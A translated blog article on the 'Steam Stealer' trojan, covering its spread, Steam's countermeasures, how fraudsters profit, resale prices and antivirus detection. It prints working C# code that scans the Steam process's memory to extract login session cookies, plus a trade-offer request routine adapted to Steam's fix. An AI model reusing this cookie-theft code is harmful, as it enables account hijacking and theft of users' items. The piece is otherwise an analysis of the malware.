Steam Stealer or Trojan stealing things on Steam. The history of the appearance and scheme of work

Write an article prompted the publication "Troyan, stealing items from the inventory of Steam . "
My article contains:
1) The history of the appearance and distribution in RuNet;
2) The history of the struggle of "Stim" with this malware;
3) Due to which fraudsters make a profit?
4) What are the incentives doing in connection with these frauds?
The article does not have full source code or links where you can get / buy it. Who cares - welcome under cat.

The history of the appearance and distribution in Runet

Who was the original author of this trojan is unknown, the first mentions appeared in America at the beginning of this year. In the runet, this trojan appeared and began to spread actively only in mid-late summer.

The program and the source code appeared in early August on a popular "cheat" portal. Two friends found the assembled and covered Trojan, noticed that it was written in C # and managed to pull out a rather confusing, but working source code. Next, the builder was compiled and posted on the portal, after some time it was laid out and rewritten into a human form and source. From this moment on, mention of him could be found everywhere. Only on a very lazy and inactive forum it was impossible to find, if not a copy of the working source, then the person selling the finished “build”.

General scheme of work:

From the Steam process, two SteamLogin and SteamLoginSecure cookies are torn out regularly:
')

WinApis.SYSTEM_INFO sYSTEM_INFO = default(WinApis.SYSTEM_INFO); while (sYSTEM_INFO.minimumApplicationAddress.ToInt32() == 0) { WinApis.GetSystemInfo(out sYSTEM_INFO); } IntPtr minimumApplicationAddress = sYSTEM_INFO.minimumApplicationAddress; long num = (long)minimumApplicationAddress.ToInt32(); List<string> list = new List<string>(); Process[] array = array = Process.GetProcessesByName("steam"); Process process = null; for (int i = 0; i < array.Length; i++) { try { foreach (ProcessModule processModule in array[i].Modules) { if (processModule.FileName.EndsWith("steamclient.dll")) { process = array[i]; break; } } } catch { } } if (process != null) { IntPtr handle = WinApis.OpenProcess(1040u, false, process.Id); WinApis.PROCESS_QUERY_INFORMATION pROCESS_QUERY_INFORMATION = default(WinApis.PROCESS_QUERY_INFORMATION); IntPtr intPtr = new IntPtr(0); while (WinApis.VirtualQueryEx(handle, minimumApplicationAddress, out pROCESS_QUERY_INFORMATION, 28u) != 0) { if (pROCESS_QUERY_INFORMATION.Protect == 4u && pROCESS_QUERY_INFORMATION.State == 4096u) { byte[] array2 = new byte[pROCESS_QUERY_INFORMATION.RegionSize]; WinApis.ReadProcessMemory(handle, pROCESS_QUERY_INFORMATION.BaseAdress, array2, pROCESS_QUERY_INFORMATION.RegionSize, out intPtr); string @string = Encoding.UTF8.GetString(array2); MatchCollection matchCollection = new Regex("7656119[0-9]{10}%7c%7c[A-F0-9]{40}", RegexOptions.IgnoreCase).Matches(@string); if (matchCollection.Count > 0) { foreach (Match match in matchCollection) { if (!list.Contains(match.Value)) { list.Add(match.Value); } } } } num += (long)((ulong)pROCESS_QUERY_INFORMATION.RegionSize); if (num >= 2147483647L) { break; } minimumApplicationAddress = new IntPtr(num); } this.ParsedSteamCookies = list; } } 

Further, the data is substituted into the web request, which is sent to the server and the session is obtained, well, authorization. After that, the program theoretically has full access to all functions of the Steam client. Getting a list of items and sending a trade offer was described in a previous article (the code given in that article for sending an offer is not working).

The history of the struggle of the stim with this malware

Since August, Steam has already made two attempts to combat this trojan. Although the second is hardly a real struggle, rather it was a side effect of some kind of update.

Fix the first. Beginning of September

As I mentioned above, 2 cookies are parsed from the client, but one of them (SteamLoginSecure) was enough to send an offer (an offer to exchange things with an attacker). Fix from Steam was that now needed both. As you understand, the “problem” in the work of the steeler was found by the same craftsmen in less than a day. Well, after another couple of days, the new actor (not me) already posted the revised source code for general access (however, he is now scolding his own deed).

Fix the second. November 17

Honestly, it's not known why, but Steam decided to add 1 parameter to the request for sending an offer:

 private string sentItems(string sessionID, string items, string[] Offer, string message = "") { return SteamHttp.SteamWebRequest(this.cookiesContainer, "tradeoffer/new/send", string.Concat(new string[] { "sessionid=", sessionID, "&partner=", Offer[0], "&serverid=1", "&tradeoffermessage=", Uri.EscapeDataString(message), "&json_tradeoffer=", Uri.EscapeDataString(string.Format("{5}\"newversion\":true,\"version\":2,\"me\":{5}\"assets\":[{3}],\"currency\":[],\"ready\":false{6},\"them\":{5}\"assets\":[],\"currency\":[],\"ready\":false{6}{6}", new object[] { sessionID, Offer[0], message, items, Offer[2], "{", "}" })), "&trade_offer_create_params=", Uri.EscapeDataString(string.Format("{0}\"trade_offer_access_token\":\"{2}\"{1}", "{", "}", Offer[2])) }), "tradeoffer/new/?partner=" + Offer[1] + "&token=" + Offer[2]); } 

Specifically, the "serverid = 1" parameter. Why it is needed and why it was added it is necessary to ask the developers of "Steam", but I could not find other requests where it could have been used.

Although explaining the "lazy" fixes from the stim is quite simple.

Due to what are fraudsters ( and Steam! ) Make a profit?

All game values ​​that scammers get are sold at a reduced price on the trading floor. Here I want to remind you that Steam gets 5% from all operations on the trading platform. And 10% gets the developer of the game, the item which was sold. Considering that the developer of the most popular games with items and the Steam service is Valve, it is quite logical that they will not be in a hurry with the fix, getting another 15% from each sold item.

Further, fraudsters in different ways are already withdrawing money from Steam. Since it cannot be done directly, they use the value of the Steam service itself to sell. For example, keys or games (as far as I know, they get about 50-65 cents per dollar).

What are they doing on Steam in connection with these scams?

It takes up to 7 days to lock an account (or rather, to block buying / selling / exchanging), which is thrown off things. During this time, attackers often have time to get rid of the items received and withdraw funds from your account. If an account is blocked, nothing can be withdrawn from it. Maximum - play those games that are on it.
I must say that in the "Steam" is the practice of returning stolen items, if they were not sold on the trading floor. But, let's say, with the Russian support it took a month:

Epilogue

He did not distribute himself. All information is taken from people who develop or distribute. The prices for this software are quite liberal: 500-1000 rubles for the program into which the account is sewn. The source is from 3.5k rubles and above - depending on whether this source is bought from the developer or from the student who bought it and now resells it. At the moment, I know about about 4 different developers. However, among themselves their products are virtually the same.

And finally. The best antiviruses at the moment by definition of such programs are Avira, Kaspersky, Eset Nod32. They define fresh and fairly decently obfuscated / covered versions of the Trojan, however, not always. The rest react for quite some time. Even the simple obfuscation of .Net applications is confused by most antiviruses.